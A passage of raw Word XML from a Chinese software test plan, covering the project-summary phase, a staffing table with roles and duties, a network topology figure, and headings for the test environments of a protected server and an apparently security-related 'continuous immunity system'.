          <w:p w14:paraId="59A80BE2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:num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B</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ug</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>回归</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDCB60B"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B</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ug</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>回归</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14408EC7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="6AB54760" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C7853E0"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项目总结阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F368806"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1天</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A0D2B3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5640B3ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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相关总结；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B43731A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:num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C</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ase和框架合并；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A3646B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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自动化case管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58502AA5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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总结本次测试中的经验和教训。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1680EA9D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47800C82" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc227386478"/>
      <w:bookmarkStart w:id="173" w:name="_Toc227386335"/>
      <w:bookmarkStart w:id="174" w:name="_Toc222309953"/>
      <w:bookmarkStart w:id="175" w:name="_Toc36487892"/>
      <w:bookmarkStart w:id="176" w:name="_Toc36573217"/>
      <w:bookmarkStart w:id="177" w:name="_Toc36630294"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试资源安排</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="166CC0E1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc222309954"/>
      <w:bookmarkStart w:id="179" w:name="_Toc227386336"/>
      <w:bookmarkStart w:id="180" w:name="_Toc227386479"/>
      <w:bookmarkStart w:id="181" w:name="_Toc36487893"/>
      <w:bookmarkStart w:id="182" w:name="_Toc36573218"/>
      <w:bookmarkStart w:id="183" w:name="_Toc36630295"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人力资源分工</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="65302F8F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>下表列出了在此项目的人员配备方面所作的各种假定。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208"/>
        <w:gridCol w:w="1515"/>
        <w:gridCol w:w="3970"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="283D837F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="049D6728"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角色</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1258" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="258B13B8"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人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="6380376F"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所推荐的投入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4142" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="48DB8300"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主要职责或注释</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>需要具化</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="7FF30AA5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AEA7993"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项目负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7046DF74"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台令明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F76A49"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80%—100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B56A2E"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处理插入事务</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B7439F"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协调项目安排</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAA0D98"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分析测试需求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD84A2B"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制定测试方案和测试计划</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A25E8B"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负责管理文档资料、case、程序、工具</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4011A4FB"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测试全程参与</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="3801FB45" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29EC5780"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测试工程师</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AE59134" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>杨康林</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04007194"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50%—100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2011EDA5"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测试全程参与</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD6933A"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分析测试需求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44DB126E"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撰写测试case（即自动化case）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235ED144"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提出关键字和自动化工具需求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078EE63D"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完善补充自动化case并执行测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10235F0C"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测试分析和测试报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="24CB39BB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F114A7A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>辅助测试开发工程师</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1562FDF1"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待定</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B4D54E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0%—</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6167C123"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参与测试工作</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64695792"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辅助关键字、工具开发、执行问题修复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38515F8B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>辅助自动化框架制定和实施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2372736E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C31B26" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc222309955"/>
      <w:bookmarkStart w:id="185" w:name="_Toc227386337"/>
      <w:bookmarkStart w:id="186" w:name="_Toc227386480"/>
      <w:bookmarkStart w:id="187" w:name="_Toc36487894"/>
      <w:bookmarkStart w:id="188" w:name="_Toc36573219"/>
      <w:bookmarkStart w:id="189" w:name="_Toc36630296"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试环境安排和使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="6FF578FD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc36487895"/>
      <w:r w:rsidRPr="00536672">
        <w:t>总体拓扑图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="372F693D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52398A84" wp14:editId="0483C42C">
            <wp:extent cx="4651227" cy="4190337"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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1049" cy="4208195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E50F38" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLineChars="200" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>图4.2.1-1</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>总体</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>网络拓扑图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E85AAD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc36487896"/>
      <w:r w:rsidRPr="00536672">
        <w:t>被保护服务器软硬件</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="48F6D4BD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4E0973C5" wp14:editId="5BAB37B6">
            <wp:extent cx="5278120" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10160"/>
            <wp:docPr id="88" name="图片 2" descr="C:\Users\ADMINI~1\AppData\Local\Temp\1551112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1\AppData\Local\Temp\1551112724(1).jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5278120" cy="1361440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C3512" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc36487897"/>
      <w:r w:rsidRPr="00536672">
        <w:t>持续免疫系统软硬件</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1846"/>
        <w:gridCol w:w="2408"/>
        <w:gridCol w:w="2197"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="0EE0CCCD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="627"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469CC848"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服务器</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
